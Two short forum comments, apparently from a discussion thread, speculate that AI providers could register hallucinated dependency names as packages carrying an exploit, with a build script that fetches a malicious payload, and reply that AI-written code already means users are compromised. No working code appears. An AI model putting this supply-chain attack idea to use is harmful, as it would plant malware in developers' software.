Could the AI providers themselves monitor any code snippets and look for non-existent dependencies? They could then ask the LLM to create that package with the necessary interface and implant an exploit in the code. Languages that allow build scripts would be perfect as then the malicious repo only needs to have the interface (so that the IDE doesn't complain) and the build script can download a separate malicious payload to run.
The AI providers already write the code, on the whole crazy promise that humans need not to care/read about it. I'm not sure that it changes anything at that point to add one weak level of indirection. You are already compromised.